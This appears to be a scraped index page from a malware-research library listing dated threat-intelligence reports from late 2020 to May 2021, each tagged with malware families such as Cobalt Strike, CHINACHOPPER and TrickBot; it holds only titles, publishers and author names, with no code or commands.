Kimberly GoodyShining a Light on DARKSIDE Ransomware Operations Cobalt Strike

DarkSide

×Select Content2021-05-10

Mal-Eats

mal_eatsOverview of Campo, a new attack campaign targeting Japan AnchorDNS

BazarBackdoor

Cobalt Strike

ISFB

Phobos

TrickBot

Zloader

×Select Content2021-05-10

ZERO.BS

ZEROBSCobaltstrike-Beacons analyzed Cobalt Strike

×Select Content2021-05-07

Cisco Talos

Andrew Windsor,

Caitlin Huey,

Edmund BrumaghinLemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs CHINACHOPPER

Cobalt Strike

Lemon Duck

×Select Content2021-05-07

Medium svch0st

svch0stStats from Hunting Cobalt Strike Beacons Cobalt Strike

×Select Content2021-05-07

TEAMT5

Aragorn Tseng,

Charles LiMem2Img: Memory-Resident Malware Detection via Convolution Neural Network Cobalt Strike

PlugX

Waterbear

×Select Content2021-05-07

SophosLabs Uncut

Rajesh NatarajNew Lemon Duck variants exploiting Microsoft Exchange Server CHINACHOPPER

Cobalt Strike

Lemon Duck

×Select Content2021-05-06

Trend Micro

Arianne Dela Cruz,

Cris Tomboc,

Jayson Chong,

Nikki Madayag,

Sean TorreProxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party BlackKingdom Ransomware

CHINACHOPPER

Lemon Duck

Prometei

×Select Content2021-05-05

TRUESEC

Mattias WåhlénAre The Notorious Cyber Criminals Evil Corp actually Russian Spies? Cobalt Strike

Hades

WastedLocker

×Select Content2021-05-05

Symantec

Threat Hunter TeamMulti-Factor Authentication: Headache for Cyber Actors Inspires New Attack Techniques CHINACHOPPER

×Select Content2021-05-05

SophosLabs Uncut

Andrew Brandt,

Gabor Szappanos,

Peter Mackenzie,

Vikas SinghIntervention halts a ProxyLogon-enabled attack Cobalt Strike

×Select Content2021-05-04

Medium sergiusechel

Sergiu SechelImproving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the risk of false positives Cobalt Strike

×Select Content2021-05-02

The DFIR Report

The DFIR ReportTrickbot Brief: Creds and Beacons Cobalt Strike

TrickBot

×Select Content2021-04-29

FireEye

Justin Moore,

Raymond Leong,

Tyler McLellanUNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat Cobalt Strike

FiveHands

HelloKitty

×Select Content2021-04-29

NTT

Threat Detection NTT Ltd.The Operations of Winnti group Cobalt Strike

ShadowPad

Spyder

Winnti

Earth Lusca

×Select Content2021-04-27

Trend Micro

Earle Earnshaw,

Janus AgcaoiliLegitimate Tools Weaponized for Ransomware in 2021 Cobalt Strike

MimiKatz

×Select Content2021-04-27

Trend Micro

Janus AgcaoiliHello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability CHINACHOPPER

Cobalt Strike

×Select Content2021-04-26

nviso

Maxime ThiebautAnatomy of Cobalt Strike’s DLL Stager Cobalt Strike

×Select Content2021-04-26

getrevue

Twitter (@80vul)Hunting Cobalt Strike DNS redirectors by using ZoomEye Cobalt Strike

×Select Content2021-04-24

Non-offensive security

Non-offensive security teamDetect Cobalt Strike server through DNS protocol Cobalt Strike

×Select Content2021-04-23

Twitter (@vikas891)

Vikas SinghTweet on DOPPEL SPIDER using Intensive/Multiple Injected Cobalt Strike Beacons with varied polling intervals Cobalt Strike

DoppelPaymer

×Select Content2021-04-22

Twitter (@AltShiftPrtScn)

Peter MackenzieTwwet On TTPs seen in IR used by DOPPEL SPIDER Cobalt Strike

DoppelPaymer

×Select Content2021-04-21

SophosLabs Uncut

Anand Aijan,

Andrew Brandt,

Markel Picado,

Michael Wood,

Sean Gallagher,

Sivagnanam Gn,

Suriya NatarajanNearly half of malware now use TLS to conceal communications Agent Tesla

Cobalt Strike

Dridex

SystemBC

×Select Content2021-04-20

Medium walmartglobaltech

Jason ReavesCobaltStrike Stager Utilizing Floating Point Math Cobalt Strike

×Select Content2021-04-19

Netresec

Erik HjelmvikAnalysing a malware PCAP with IcedID and Cobalt Strike traffic Cobalt Strike

IcedID

×Select Content2021-04-18

YouTube (dist67)

Didier StevensDecoding Cobalt Strike Traffic Cobalt Strike

×Select Content2021-04-16

Trend Micro

Nitesh SuranaCould the Microsoft Exchange breach be stopped? CHINACHOPPER

×Select Content2021-04-15

Palo Alto Networks Unit 42

Robert FalconeActor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials CHINACHOPPER

×Select Content2021-04-14

InfoSec Handlers Diary Blog

Brad DuncanApril 2021 Forensic Quiz: Answers and Analysis Anchor

BazarBackdoor

Cobalt Strike

×Select Content2021-04-12

Inde

Chris CampbellA Different Kind of Zoombomb Cobalt Strike

×Select Content2021-04-09

F-Secure

Giulio Ginesi,

Riccardo AncaraniDetecting Exposed Cobalt Strike DNS Redirectors Cobalt Strike

×Select Content2021-04-07

Medium sixdub

Justin WarnerUsing Kaitai Struct to Parse Cobalt Strike Beacon Configs Cobalt Strike

×Select Content2021-04-05

Medium walmartglobaltech

Jason Reaves,

Joshua PlattTrickBot Crews New CobaltStrike Loader Cobalt Strike

TrickBot

×Select Content2021-04-01

DomainTools

Joe SlowikCOVID-19 Phishing With a Side of Cobalt Strike Cobalt Strike

×Select Content2021-04-01

Palo Alto Networks Unit 42

Brad DuncanHancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool Cobalt Strike

Hancitor

Moskalvzapoe

×Select Content2021-03-31

Red Canary

Red Canary2021 Threat Detection Report Shlayer

Andromeda

Cobalt Strike

Dridex

Emotet

IcedID

MimiKatz

QakBot

TrickBot

×Select Content2021-03-30

GuidePoint Security

Drew SchmittYet Another Cobalt Strike Stager: GUID Edition Cobalt Strike

×Select Content2021-03-29

The Record

Catalin CimpanuRedEcho group parks domains after public exposure PlugX

ShadowPad

RedEcho

×Select Content2021-03-29

The DFIR Report

The DFIR ReportSodinokibi (aka REvil) Ransomware Cobalt Strike

IcedID

REvil

×Select Content2021-03-26

Imperva

Daniel JohnstonImperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures CHINACHOPPER

×Select Content2021-03-25

Microsoft

Tom McElroyWeb Shell Threat Hunting with Azure Sentinel CHINACHOPPER

×Select Content2021-03-25

Recorded Future

Insikt Group®Suspected Chinese Group Calypso APT Exploiting Vulnerable Microsoft Exchange Servers Meterpreter

PlugX

×Select Content2021-03-25

Microsoft

Microsoft 365 Defender Threat Intelligence TeamAnalyzing attacks taking advantage of the Exchange Server vulnerabilities CHINACHOPPER

×Select Content2021-03-21

Twitter (@CyberRaiju)

Jai MintonTwitter Thread with analysis of .NET China Chopper CHINACHOPPER

×Select Content2021-03-21

YouTube (dist67)

Didier StevensFinding Metasploit & Cobalt Strike URLs Cobalt Strike

×Select Content2021-03-21

Blackberry

Blackberry Research2021 Threat Report Bashlite

FritzFrog

IPStorm

Mirai

Tsunami

elf.wellmess

AppleJeus

Dacls

EvilQuest

Manuscrypt

Astaroth

BazarBackdoor

Cerber

Cobalt Strike

Emotet

FinFisher RAT

Kwampirs

MimiKatz

NjRAT

Ryuk

SmokeLoader

TrickBot

×Select Content2021-03-19

Bundesamt für Sicherheit in der Informationstechnik

CERT-BundMicrosoft Exchange Schwachstellen Detektion und Reaktion (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) CHINACHOPPER

MimiKatz

×Select Content2021-03-18

DeepInstinct

Ben GrossCobalt Strike – Post-Exploitation Attackers Toolkit Cobalt Strike

×Select Content2021-03-18

PRODAFT Threat Intelligence

PRODAFTSilverFish GroupThreat Actor Report Cobalt Strike

Dridex

Koadic

×Select Content2021-03-17

Recorded Future

Insikt Group®China-linked TA428 Continues to Target Russia and Mongolia IT Companies PlugX

Poison Ivy

TA428

×Select Content2021-03-16

Elastic

Joe DesimoneDetecting Cobalt Strike with memory signatures Cobalt Strike

×Select Content2021-03-16

McAfee

McAfee ATRTechnical Analysis of Operation Diànxùn Cobalt Strike

×Select Content2021-03-15

Trustwave

Joshua DeaconHAFNIUM, China Chopper and ASP.NET Runtime CHINACHOPPER

×Select Content2021-03-11

Cyborg Security

Josh CampbellYou Don't Know the HAFNIUM of it... CHINACHOPPER

Cobalt Strike

PowerCat

×Select Content2021-03-11

Qurium

QuriumMyanmar – Multi-stage malware attack targets elected lawmakers Cobalt Strike

×Select Content2021-03-11

Palo Alto Networks Unit 42

Unit 42Microsoft Exchange Server Attack Timeline CHINACHOPPER

×Select Content2021-03-11

DEVO

Fran GomezDetection and Investigation Using Devo: HAFNIUM 0-day Exploits on Microsoft Exchange Service CHINACHOPPER

MimiKatz

×Select Content2021-03-10

Lemon's InfoSec Ramblings

Josh LemonMicrosoft Exchange & the HAFNIUM Threat Actor CHINACHOPPER

×Select Content2021-03-10

PICUS Security

Süleyman ÖzarslanTactics, Techniques, and Procedures (TTPs) Used by HAFNIUM to Target Microsoft Exchange Servers CHINACHOPPER

×Select Content2021-03-10

ESET Research

Mathieu Tartare,

Matthieu Faou,

Thomas DupuyExchange servers under siege from at least 10 APT groups Microcin

MimiKatz

PlugX

Winnti

APT27

APT41

Calypso

Tick

ToddyCat

Tonto Team

Vicious Panda

×Select Content2021-03-10

DomainTools

Joe SlowikExamining Exchange Exploitation and its Lessons for Defenders CHINACHOPPER

×Select Content2021-03-10

Proofpoint

Dennis Schwarz,

Matthew Mesa,

Proofpoint Threat Research TeamNimzaLoader: TA800’s New Initial Access Malware BazarNimrod

Cobalt Strike

×Select Content2021-03-09

Palo Alto Networks Unit 42

Unit 42Remediation Steps for the Microsoft Exchange Server Vulnerabilities CHINACHOPPER

×Select Content2021-03-09

splunk

Security Research TeamCloud Federated Credential Abuse & Cobalt Strike: Threat Research February 2021 Cobalt Strike

×Select Content2021-03-09

Red Canary

Brian Donohue,

Katie Nickels,

Tony LambertMicrosoft Exchange server exploitation: how to detect, mitigate, and stay calm CHINACHOPPER

×Select Content2021-03-09

PRAETORIAN

Anthony Weems,

Dallas Kaman,

Michael WeberReproducing the Microsoft Exchange Proxylogon Exploit Chain CHINACHOPPER

×Select Content2021-03-09

YouTube (John Hammond)

John HammondHAFNIUM - Post-Exploitation Analysis from Microsoft Exchange CHINACHOPPER

×Select Content2021-03-08

Youtube (SANS Digital Forensics and Incident Response)

Adam Pennington,

Jen Burns,

Katie NickelsSTAR Webcast: Making sense of SolarWinds through the lens of MITRE ATT&CK(R) Cobalt Strike

SUNBURST

TEARDROP

×Select Content2021-03-08

Symantec

Threat Hunter TeamHow Symantec Stops Microsoft Exchange Server Attacks CHINACHOPPER

MimiKatz

×Select Content2021-03-08

Palo Alto Networks Unit 42

Jeff WhiteAnalyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells CHINACHOPPER

×Select Content2021-03-08

The DFIR Report

The DFIR ReportBazar Drops the Anchor Anchor

BazarBackdoor

Cobalt Strike

×Select Content2021-03-07

TRUESEC

Rasmus GrönlundTracking Microsoft Exchange Zero-Day ProxyLogon and HAFNIUM CHINACHOPPER

×Select Content2021-03-07

InfoSec Handlers Diary Blog

Didier StevensPCAPs and Beacons Cobalt Strike

×Select Content2021-03-05

Wired

Andy GreenbergChinese Hacking Spree Hit an ‘Astronomical’ Number of Victims CHINACHOPPER

×Select Content2021-03-05

Huntress Labs

Huntress LabsOperation Exchange Marauder CHINACHOPPER

×Select Content2021-03-04

Huntress Labs

Huntress LabsOperation Exchange Marauder CHINACHOPPER

×Select Content2021-03-04

FireEye

Andrew Thompson,

Chris DiGiamo,

Matt Bromiley,

Robert WallaceDetection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities CHINACHOPPER

HAFNIUM

×Select Content2021-03-04

CrowdStrike

The Falcon Complete TeamFalcon Complete Stops Microsoft Exchange Server Zero-Day Exploits CHINACHOPPER

HAFNIUM

×Select Content2021-03-03

Huntress Labs

John HammondRapid Response: Mass Exploitation of On-Prem Exchange Servers CHINACHOPPER

HAFNIUM

×Select Content2021-03-03

Huntress Labs

Huntress LabsMass exploitation of on-prem Exchange servers :( CHINACHOPPER

HAFNIUM

×Select Content2021-03-03

MITRE

MITRE ATT&CKHAFNIUM CHINACHOPPER

HAFNIUM

×Select Content2021-03-02

Twitter (@ESETresearch)

ESET ResearchTweet on Exchange RCE CHINACHOPPER

HAFNIUM

×Select Content2021-03-02

Volexity

Josh Grunzweig,

Matthew Meltzer,

Sean Koessel,

Steven Adair,

Thomas LancasterOperation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities CHINACHOPPER

HAFNIUM

×Select Content2021-03-02

Rapid7 Labs

Andrew ChristianRapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day CHINACHOPPER

HAFNIUM

×Select Content2021-03-02

Microsoft

Microsoft 365 Defender Threat Intelligence Team,

Microsoft 365 Security,

Microsoft Threat Intelligence Center (MSTIC)HAFNIUM targeting Exchange Servers with 0-day exploits CHINACHOPPER

HAFNIUM

×Select Content2021-03-01

Medium walmartglobaltech

Jason Reaves,

Joshua PlattInvestigation into the state of Nim malware BazarNimrod

Cobalt Strike

×Select Content2021-03-01

Medium walmartglobaltech

Jason Reaves,

Joshua PlattNimar Loader BazarBackdoor

BazarNimrod

Cobalt Strike

×Select Content2021-02-28

Recorded Future

Insikt Group®China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions Icefog

PlugX

ShadowPad

×Select Content2021-02-28

PWC UK

PWC UKCyber Threats 2020: A Year in Retrospect elf.wellmess

FlowerPower

PowGoop

8.t Dropper

Agent.BTZ

Agent Tesla

Appleseed

Ave Maria

Bankshot

BazarBackdoor

BLINDINGCAN

Chinoxy

Conti

Cotx RAT

Crimson RAT

DUSTMAN

Emotet

FriedEx

FunnyDream

Hakbit

Mailto

Maze

METALJACK

Nefilim

Oblique RAT

Pay2Key

PlugX

QakBot

REvil

Ryuk

StoneDrill

StrongPity

SUNBURST

SUPERNOVA

TrickBot

TurlaRPC

Turla SilentMoon

WastedLocker

WellMess

Winnti

ZeroCleare

APT10

APT23

APT27

APT31

APT41

BlackTech

BRONZE EDGEWOOD

Inception Framework

MUSTANG PANDA

Red Charon

Red Nue

Sea Turtle

Tonto Team

×Select Content2021-02-28

Recorded Future

Insikt Group®China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions PlugX

ShadowPad

RedEcho

×Select Content2021-02-26

CrowdStrike

Eric Loui,

Sergei FrankoffHypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact DarkSide

RansomEXX

Griffon

Carbanak

Cobalt Strike

DarkSide

IcedID

MimiKatz

PyXie

RansomEXX

REvil

×Select Content2021-02-25

FireEye

Brendan McKeague,

Bryce Abdo,

Van TaSo Unchill: Melting UNC2198 ICEDID to Ransomware Operations MOUSEISLAND

Cobalt Strike

Egregor

IcedID

Maze

SystemBC

×Select Content2021-02-24

Github (AmnestyTech)

Amnesty InternationalOverview of Ocean Lotus Samples used to target Vietnamese Human Rights Defenders OceanLotus

Cobalt Strike

KerrDown

×Select Content2021-02-24

VMWare Carbon Black

Takahiro HaruyamaKnock, knock, Neo. - Active C2 Discovery Using Protocol Emulation Cobalt Strike

×Select Content2021-02-23

CrowdStrike

CrowdStrike2021 Global Threat Report RansomEXX

Amadey

Anchor

Avaddon

BazarBackdoor

Clop

Cobalt Strike

Conti

Cutwail

DanaBot

DarkSide

DoppelPaymer

Dridex

Egregor

Emotet

Hakbit

IcedID

JSOutProx

KerrDown

LockBit

Mailto

Maze

MedusaLocker

Mespinoza

Mount Locker

NedDnLoader

Nemty

Pay2Key

PlugX

Pushdo

PwndLocker

PyXie

QakBot

Quasar RAT

RagnarLocker

Ragnarok

RansomEXX

REvil

Ryuk

Sekhmet

ShadowPad

SmokeLoader

Snake

SUNBURST

SunCrypt

TEARDROP

TrickBot

WastedLocker

Winnti

Zloader

Evilnum

OUTLAW SPIDER

RIDDLE SPIDER

SOLAR SPIDER

VIKING SPIDER

×Select Content2021-02-11

Twitter (@TheDFIRReport)

The DFIR ReportTweet on Hancitor Activity followed by cobaltsrike beacon Cobalt Strike

Hancitor

×Select Content2021-02-09

Securehat

SecurehatExtracting the Cobalt Strike Config from a TEARDROP Loader Cobalt Strike

TEARDROP

×Select Content2021-02-09

Cobalt Strike

Raphael MudgeLearn Pipe Fitting for all of your Offense Projects Cobalt Strike

×Select Content2021-02-03

InfoSec Handlers Diary Blog

Brad DuncanExcel spreadsheets push SystemBC malware Cobalt Strike

SystemBC

×Select Content2021-02-02

Twitter (@TheDFIRReport)

The DFIR ReportTweet on recent dridex post infection activity Cobalt Strike

Dridex

×Select Content2021-02-02

CRONUP

Germán FernándezDe ataque con Malware a incidente de Ransomware Avaddon

BazarBackdoor

Buer

Clop

Cobalt Strike

Conti

DanaBot

Dharma

Dridex

Egregor

Emotet

Empire Downloader

FriedEx

GootKit

IcedID

MegaCortex

Nemty

Phorpiex

PwndLocker

PyXie

QakBot

RansomEXX

REvil

Ryuk

SDBbot

SmokeLoader

TrickBot

Zloader

×Select Content2021-02-02

Committee to Protect Journalists

Madeline EarpHow Vietnam-based hacking operation OceanLotus targets journalists Cobalt Strike

×Select Content2021-02-01

pkb1s.github.io

Petros KoutroumpisRelay Attacks via Cobalt Strike Beacons Cobalt Strike

×Select Content2021-02-01

AhnLab

ASEC Analysis TeamBlueCrab ransomware, CobaltStrike hacking tool installed in corporate environment Cobalt Strike

REvil

×Select Content2021-01-31

The DFIR Report

The DFIR ReportBazar, No Ryuk? BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2021-01-29

Trend Micro

Trend MicroChopper ASPX web shell used in targeted attack CHINACHOPPER

MimiKatz

×Select Content2021-01-28

AhnLab

ASEC Analysis TeamBlueCrab ransomware constantly trying to bypass detection Cobalt Strike

REvil

×Select Content2021-01-28

TrustedSec

Adam ChesterTailoring Cobalt Strike on Target Cobalt Strike

×Select Content2021-01-26

Twitter (@swisscom_csirt)

Swisscom CSIRTTweet on Cring Ransomware groups using customized Mimikatz sample followed by CobaltStrike and dropping Cring rasomware Cobalt Strike

Cring

MimiKatz

×Select Content2021-01-20

Microsoft

Microsoft 365 Defender Research Team,

Microsoft Cyber Defense Operations Center (CDOC),

Microsoft Threat Intelligence Center (MSTIC)Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop Cobalt Strike

SUNBURST

TEARDROP

×Select Content2021-01-20

Trend Micro

Abraham Camba,

Gilbert Sison,

Ryan MaglaqueXDR investigation uncovers PlugX, unique technique in APT attack PlugX

×Select Content2021-01-18

Symantec

Threat Hunter TeamRaindrop: New Malware Discovered in SolarWinds Investigation Cobalt Strike

Raindrop

SUNBURST

TEARDROP

×Select Content2021-01-17

Twitter (@AltShiftPrtScn)

Peter MackenzieTweet on Conti Ransomware group exploiting FortiGate VPNs to drop in CobaltStrike loaders Cobalt Strike

Conti

×Select Content2021-01-15

Swisscom

Markus NeisCracking a Soft Cell is Harder Than You Think Ghost RAT

MimiKatz

PlugX

Poison Ivy

Trochilus RAT

×Select Content2021-01-15

The Hacker News

Ravie LakshmamanResearchers Disclose Undocumented Chinese Malware Used in Recent Attacks CROSSWALK

×Select Content2021-01-15

Medium Dansec

Dan LussierDetecting Malicious C2 Activity -SpawnAs & SMB Lateral Movement in CobaltStrike Cobalt Strike

×Select Content2021-01-14

PTSecurity

PT ESC Threat IntelligenceHigaisa or Winnti? APT41 backdoors, old and new Cobalt Strike

CROSSWALK

FunnySwitch

PlugX

ShadowPad

×Select Content2021-01-12

BrightTALK (FireEye)

Ben Read,

John HultquistUNC2452: What We Know So Far Cobalt Strike

SUNBURST

TEARDROP

×Select Content2021-01-12

Fox-IT

Wouter JansenAbusing cloud services to fly under the radar Cobalt Strike

×Select Content2021-01-11

SolarWinds

Sudhakar RamakrishnaNew Findings From Our Investigation of SUNBURST Cobalt Strike

SUNBURST

TEARDROP

×Select Content2021-01-11

The DFIR Report

The DFIR ReportTrickbot Still Alive and Well Cobalt Strike

TrickBot

×Select Content2021-01-10

Medium walmartglobaltech

Jason ReavesMAN1, Moskal, Hancitor and a side of Ransomware Cobalt Strike

Hancitor

SendSafe

VegaLocker

Moskalvzapoe

×Select Content2021-01-09

Marco Ramilli's Blog

Marco RamilliCommand and Control Traffic Patterns ostap

LaZagne

Agent Tesla

Azorult

Buer

Cobalt Strike

DanaBot

DarkComet

Dridex

Emotet

Formbook

IcedID

ISFB

NetWire RC

PlugX

Quasar RAT

SmokeLoader

TrickBot

×Select Content2021-01-09

Connor McGarr's Blog

Connor McGarrMalware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking Cobalt Strike

×Select Content2021-01-07

Recorded Future

Insikt Group®Aversary Infrastructure Report 2020: A Defender's View Octopus

pupy

Cobalt Strike

Empire Downloader

Meterpreter

PoshC2

×Select Content2021-01-06

Red Canary

Tony LambertHunting for GetSystem in offensive security tools Cobalt Strike

Empire Downloader

Meterpreter

PoshC2

×Select Content2021-01-05

Trend Micro

Trend Micro ResearchEarth Wendigo Injects JavaScript Backdoor to Service Worker for Mailbox Exfiltration Cobalt Strike

Earth Wendigo

×Select Content2021-01-04

Bleeping Computer

Ionut IlascuChina's APT hackers move to ransomware attacks Clambling

PlugX

×Select Content2021-01-04

Medium haggis-m

Michael HaagMalleable C2 Profiles and You Cobalt Strike

×Select Content2021-01-01

AWAKE

Awake SecurityBreaking the Ice: Detecting IcedID and Cobalt Strike Beacon with Network Detection and Response (NDR) Cobalt Strike

IcedID

PhotoLoader

×Select Content2021-01-01

DomainTools

Joe SlowikConceptualizing a Continuum of Cyber Threat Attribution CHINACHOPPER

SUNBURST

×Select Content2021-01-01

Secureworks

SecureWorksThreat Profile: GOLD WATERFALL Cobalt Strike

DarkSide

GOLD WATERFALL

×Select Content2021-01-01

Mandiant

MandiantM-TRENDS 2021 Cobalt Strike

SUNBURST

×Select Content2021-01-01

Github (WBGlIl)

WBGlIlA book on cobaltstrike Cobalt Strike

×Select Content2021-01-01

Symantec

Symantec Threat Hunter TeamSupply Chain Attacks:Cyber Criminals Target the Weakest Link Cobalt Strike

Raindrop

SUNBURST

TEARDROP

×Select Content2021-01-01

Secureworks

SecureWorksThreat Profile: GOLD WINTER Cobalt Strike

Hades

Meterpreter

GOLD WINTER

×Select Content2021-01-01

Talos

Talos Incident ResponseEvicting Maze Cobalt Strike

Maze

×Select Content2021-01-01

SecureWorksThreat Profile: GOLD DRAKE Cobalt Strike

Dridex

FriedEx

Koadic

MimiKatz

WastedLocker

Evil Corp

×Select Content2021-01-01

Talos

Talos Incident ResponseCobalt Strikes Out Cobalt Strike

×Select Content2020-12-26

Medium grimminck

Stefan GrimminckSpoofing JARM signatures. I am the Cobalt Strike server now! Cobalt Strike

×Select Content2020-12-26

CYBER GEEKS All Things Infosec

CyberMasterVAnalyzing APT19 malware using a step-by-step method Derusbi

×Select Content2020-12-24

IronNet

Adam HlavekChina cyber attacks: the current threat landscape PLEAD

TSCookie

FlowCloud

Lookback

PLEAD

PlugX

Quasar RAT

Winnti

×Select Content2020-12-22

TRUESEC

Mattias WåhlénCollaboration between FIN7 and the RYUK group, a Truesec Investigation Carbanak

Cobalt Strike

Ryuk

×Select Content2020-12-21

Fortinet

Udi YavoWhat We Have Learned So Far about the “Sunburst”/SolarWinds Hack Cobalt Strike

SUNBURST

TEARDROP

×Select Content2020-12-20

Randhome

Etienne MaynierAnalyzing Cobalt Strike for Fun and Profit Cobalt Strike

×Select Content2020-12-15

Github (sophos-cybersecurity)

Sophos Cyber Security Teamsolarwinds-threathunt Cobalt Strike

SUNBURST

×Select Content2020-12-15

PICUS Security

Süleyman ÖzarslanTactics, Techniques, and Procedures (TTPs) Used in the SolarWinds Breach Cobalt Strike

SUNBURST

×Select Content2020-12-14

Palo Alto Networks Unit 42

Unit 42Threat Brief: SolarStorm and SUNBURST Customer Coverage Cobalt Strike

SUNBURST

×Select Content2020-12-11

Blackberry

BlackBerry Research and Intelligence teamMountLocker Ransomware-as-a-Service Offers Double Extortion Capabilities to Affiliates Cobalt Strike

Mount Locker

×Select Content2020-12-10

ESET Research

Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro

PlugX

Tmanger

TA428

×Select Content2020-12-10

ESET Research

Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro

PlugX

ShadowPad

Tmanger

×Select Content2020-12-10

Palo Alto Networks Unit 42

Unit42Threat Brief: FireEye Red Team Tool Breach Cobalt Strike

×Select Content2020-12-10

Intel 471

Intel 471No pandas, just people: The current state of China’s cybercrime underground Anubis

SpyNote

AsyncRAT

Cobalt Strike

Ghost RAT

NjRAT

×Select Content2020-12-09

InfoSec Handlers Diary Blog

Brad DuncanRecent Qakbot (Qbot) activity Cobalt Strike

QakBot

×Select Content2020-12-09

Avast Decoded

Igor Morgenstern,

Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas

HyperBro

PlugX

PolPo

Tmanger

×Select Content2020-12-09

Cisco

Caitlin Huey,

David LiebenbergQuarterly Report: Incident Response trends from Fall 2020 Cobalt Strike

IcedID

Maze

RansomEXX

Ryuk

×Select Content2020-12-09

FireEye

Mitchell Clarke,

Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations (SLIDES) Cobalt Strike

DoppelPaymer

QakBot

REvil

×Select Content2020-12-09

Avast Decoded

Igor Morgenstern,

Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas

HyperBro

PlugX

Tmanger

TA428

×Select Content2020-12-08

Cobalt Strike

Raphael MudgeA Red Teamer Plays with JARM Cobalt Strike

×Select Content2020-12-02

Red Canary

twitter (@redcanary)Tweet on increased #Qbot activity delivering Cobalt Strike & #Egregor ransomware Cobalt Strike

Egregor

QakBot

×Select Content2020-12-01

mez0.cc

mez0Cobalt Strike PowerShell Execution Cobalt Strike

×Select Content2020-12-01

360.cn

jindanlongHunting Beacons Cobalt Strike

×Select Content2020-11-30

FireEye

Mitchell Clarke,

Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations Cobalt Strike

DoppelPaymer

MimiKatz

QakBot

REvil

×Select Content2020-11-30

Microsoft

Microsoft 365 Defender Threat Intelligence Team,

Microsoft Threat Intelligence Center (MSTIC)Threat actor (BISMUTH) leverages coin miner techniques to stay under the radar – here’s how to spot them Cobalt Strike

×Select Content2020-11-27

Macnica

Hiroshi TakeuchiAnalyzing Organizational Invasion Ransom Incidents Using Dtrack Cobalt Strike

Dtrack

×Select Content2020-11-27

PTSecurity

Alexey Vishnyakov,

Denis GoydenkoInvestigation with a twist: an accidental APT attack and averted data destruction TwoFace

CHINACHOPPER

HyperBro

MegaCortex

MimiKatz

×Select Content2020-11-26

Cybereason

Cybereason Nocturnus,

Lior RochbergerCybereason vs. Egregor Ransomware Cobalt Strike

Egregor

IcedID

ISFB

QakBot

×Select Content2020-11-25

SentinelOne

Jim WalterEgregor RaaS Continues the Chaos with Cobalt Strike and Rclone Cobalt Strike

Egregor

×Select Content2020-11-23

Proofpoint

Proofpoint Threat Research TeamTA416 Goes to Ground and Returns with a Golang PlugX Malware Loader PlugX

MUSTANG PANDA

×Select Content2020-11-23

Youtube (OWASP DevSlop)

Negar Shabab,

Noushin ShababCompromised Compilers - A new perspective of supply chain cyber attacks ShadowPad

×Select Content2020-11-20

ZDNet

Catalin CimpanuThe malware that usually installs ransomware and you need to remove right away Avaddon

BazarBackdoor

Buer

Clop

Cobalt Strike

Conti

DoppelPaymer

Dridex

Egregor

Emotet

FriedEx

MegaCortex

Phorpiex

PwndLocker

QakBot

Ryuk

SDBbot

TrickBot

Zloader

×Select Content2020-11-20

F-Secure Labs

Riccardo AncaraniDetecting Cobalt Strike Default Modules via Named Pipe Analysis Cobalt Strike

×Select Content2020-11-20

Trend Micro

Abraham Camba,

Bren Matthew Ebriega,

Gilbert SisonWeaponizing Open Source Software for Targeted Attacks LaZagne

Defray

PlugX

×Select Content2020-11-20

360 netlab

JiaYuBlackrota, a highly obfuscated backdoor developed by Go Cobalt Strike

×Select Content2020-11-17

Salesforce Engineering

John AlthouseEasily Identify Malicious Servers on the Internet with JARM Cobalt Strike

TrickBot

×Select Content2020-11-17

cyble

CybleOceanLotus Continues With Its Cyber Espionage Operations Cobalt Strike

Meterpreter

×Select Content2020-11-15

Trustnet

Michael WainshtainFrom virus alert to PowerShell Encrypted Loader Cobalt Strike

×Select Content2020-11-13

Youtube (The Standoff)

Alexey Zakharov,

Positive TechnologiesFF_202_Eng - From old Higaisa samples to new Winnti backdoors: The story of one research CROSSWALK

Unidentified 076 (Higaisa LNK to Shellcode)

×Select Content2020-11-09

Bleeping Computer

Ionut IlascuFake Microsoft Teams updates lead to Cobalt Strike deployment Cobalt Strike

DoppelPaymer

NjRAT

Predator The Thief

Zloader

×Select Content2020-11-06

Cobalt Strike

Raphael MudgeCobalt Strike 4.2 – Everything but the kitchen sink Cobalt Strike

×Select Content2020-11-06

Palo Alto Networks Unit 42

CRYPSIS,

Drew Schmitt,

Ryan TraceyIndicators of Compromise related to Cobaltstrike, PyXie Lite, Vatet and Defray777 Cobalt Strike

PyXie

RansomEXX

×Select Content2020-11-06

Advanced Intelligence

Vitali KremezAnatomy of Attack: Inside BazarBackdoor to Ryuk Ransomware "one" Group via Cobalt Strike BazarBackdoor

Cobalt Strike

Ryuk

×Select Content2020-11-06

Volexity

Steven Adair,

Thomas Lancaster,

Volexity Threat ResearchOceanLotus: Extending Cyber Espionage Operations Through Fake Websites Cobalt Strike

KerrDown

APT32

×Select Content2020-11-05

Twitter (@ffforward)

TheAnalystTweet on Zloader infection leads to Cobaltstrike Installation and deployment of RYUK Cobalt Strike

Ryuk

Zloader

×Select Content2020-11-05

The DFIR Report

The DFIR ReportRyuk Speed Run, 2 Hours to Ransom BazarBackdoor

Cobalt Strike

Ryuk

